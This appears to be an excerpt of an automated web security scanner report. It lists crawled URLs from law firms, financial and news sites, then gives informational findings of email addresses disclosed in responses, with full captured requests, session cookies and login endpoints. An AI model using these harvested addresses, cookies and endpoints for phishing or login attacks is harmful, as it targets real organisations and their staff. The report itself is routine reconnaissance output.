http://labs.csscorp.com/site/js/cform_popup.js
http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js
http://media.ft.com/j/FTTrack2.js
http://securelab.digiware.net/
https://services.sungarddx.com/default.aspx
http://translate.googleapis.com/translate_a/t
http://translate.googleapis.com/translate_a/t
http://translate.googleapis.com/translate_a/t
http://w.sharethis.com/button/buttons.js
https://ww3.janus.com/advisor/js/modalbox.js
https://ww3.janus.com/advisor/js/validation.js
http://www.ams-legal.com/services_and_support.asp
http://www.apolloglobal.us/templates/global/js/roksameheight.js
http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg
http://www.condorlabs.net/wp-content/themes/idream/js/jquery.pngFix.js
http://www.conferenceservers.com/brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe
http://www.csscorp.com/js/mega_dropdown.js
http://www.digiware.net/formularios/form3.php
http://www.foxbusiness.com/static/all/js/jquery.plugins.js
http://www.friedkanelaw.com/Attorneys/jbh_main.htm
http://www.gobignetwork.com/content/js/jquery/jquery.hoverIntent.js
http://www.google.com/search
http://www.google.com/search
http://www.hbsr.com/contact_us/index
http://www.huroncapital.com/secure/
http://www.korteco.com/ftp-info
http://www.milbank.com/en/Alumni/
http://www.mimecast.com/
http://www.mimecast.com/About-us/Contact-us/
http://www.mimecast.com/Customers/
http://www.mimecast.com/How-to-buy/
http://www.mimecast.com/News-and-views/Press-releases/
http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
http://www.mimecast.com/Scripts/howtobuy.js
http://www.mimecast.com/Scripts/jquery.colorbox.min.js
http://www.mimecast.com/Templates/Pages/images/icons/desktop.png
http://www.mimecast.com/What-we-offer/
http://www.moritthock.com/
http://www.opalgroup.net/conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php
https://www.opalgroup.net/js/chainedselects.js
http://www.pepperlaw.com/
http://www.pepperlaw.com/contact.aspx
http://www.pepperlaw.com/contact_Comments.aspx
http://www.pepperlaw.com/ourlawyers.aspx
http://www.pepperlaw.com/publications.aspx
http://www.pillsburylaw.com/index.cfm
http://www.pillsburylaw.com/scripts/jquery.cookie.js
http://www.pillsburylaw.com/scripts/jquery.dimensions.js
http://www.pomerantzlaw.com/attorneys.html
http://www.pomerantzlaw.com/attorneys.html
http://www.pomerantzlaw.com/cases.html
http://www.pomerantzlaw.com/contact-us.html
http://www.privateequityinfo.com/
http://www.privateequityinfo.com/forgotpassword.php
http://www.privateequityinfo.com/product_details.php
http://www.provequity.com/news/releases/SRA%20Press%20Release%204%201%2011.PDF
http://www.soundpatheview.com/
http://www.stroock.com/
http://www.tpg.com/contact.html
http://www.tuckerellis.com/attorneys/index
http://www.tuckerellis.com/attorneys/k-anderson
http://www.vcprodatabase.com/favicon.ico

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

22.1. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

4dcbc6fd@cdn.turn.com

Request

Response

22.2. http://ads.foxnews.com/js/omtr_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.foxnews.com
Path:	/js/omtr_code.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /js/omtr_code.js HTTP/1.1
Host: ads.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 05 Jan 2011 23:22:43 GMT
ETag: "504b9e-c133-49921a97796c0"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 1d
Content-Type: text/javascript
Vary: Accept-Encoding
Cache-Control: max-age=12258
Date: Thu, 12 May 2011 11:37:58 GMT
Connection: close
Content-Length: 49459

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=
...[SNIP]...

22.3. https://ams-legal.net/support/Login.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/support/Login.asp

Issue detail

The following email address was disclosed in the response:

support@ams-legal.com

Request

POST /support/Login.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

newPassword=1&userid=&password=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2975
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:45 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...
<a href="mailto:support@ams-legal.com">support@ams-legal.com</a>
...[SNIP]...

22.4. http://axley.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://axley.com
Path:	/

Issue detail

The following email address was disclosed in the response:

law@axley.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:01 GMT
Set-Cookie: JSESSIONID=9F000B72936C899EC0768471D81E1100; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 22030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="generator" content="IMS Neptune CMS v1.0" />
<meta http-equiv="content-type" content="text
...[SNIP]...
s="imagerotator" src="/images/banner_1.JPG" width="956" height="150" alt="Axley Brynelson, LLP: Madison Wisconsin Law Firm: 2 E Mifflin St Ste 200: Madison Wisconsin 53703: 608.257.5661: 800.368.5661: law@axley.com"/>
...[SNIP]...
<td class="footer">
2 East Mifflin Street, Suite 200 | Madison, WI 53703 | 608.257.5661 | law@axley.com

</td>
...[SNIP]...

22.5. http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.taboolasyndication.com
Path:	/libtrc/bloomberg/rbox.en.4-6-15-45512.json

Issue detail

The following email address was disclosed in the response:

info@taboola.com

Request

GET /libtrc/bloomberg/rbox.en.4-6-15-45512.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 09:02:58 GMT
ETag: "16b8a8c-284-4a310749b9480"
Accept-Ranges: bytes
Content-Length: 644
Content-Type: text/plain; charset=UTF-8
Content-Language: en, en
Cache-Control: private, max-age=31536000
Age: 8994
Expires: Fri, 11 May 2012 09:07:47 GMT
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...
<info@taboola.com>
...[SNIP]...

22.6. http://dealbook.nytimes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET / HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 83628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.7. http://dealbook.nytimes.com/2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200208493:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.8.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; nyt-m=ECB414D3480282E2168C79BA31B0FBB4&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.14.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 60222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.8. http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=gi367p67ehp7835r; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:2|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200224858:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.10.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; nyt-m=3B3EA29AB7EF33C8FFC839DD45F6685A&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 58761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.9. http://dealbook.nytimes.com/2011/05/03/onex-sells-husky-international-for-2-1-billion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/03/onex-sells-husky-international-for-2-1-billion/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/03/onex-sells-husky-international-for-2-1-billion/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; nyt-m=A3E775540473FF3264459DEBEF9BAA82&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200243892:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.16.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 61671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.10. http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/03/private-equity-titans-finds-common-ground/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/03/private-equity-titans-finds-common-ground/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:2|s*2554b=0:1; nyt-m=A3E775540473FF3264459DEBEF9BAA82&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200243892:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.16.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 63434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.11. http://dealbook.nytimes.com/2011/05/06/how-well-did-warner-musics-investors-do/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/2011/05/06/how-well-did-warner-musics-investors-do/

Issue detail

The following email address was disclosed in the response:

dealprof@nytimes.com

Request

GET /2011/05/06/how-well-did-warner-musics-investors-do/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
X-Moz: prefetch
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=930466E95F2396695730936FACC2FDD6&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.19.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199699919:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.10.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f3=0:1|s*192f7=0:2|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 60505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

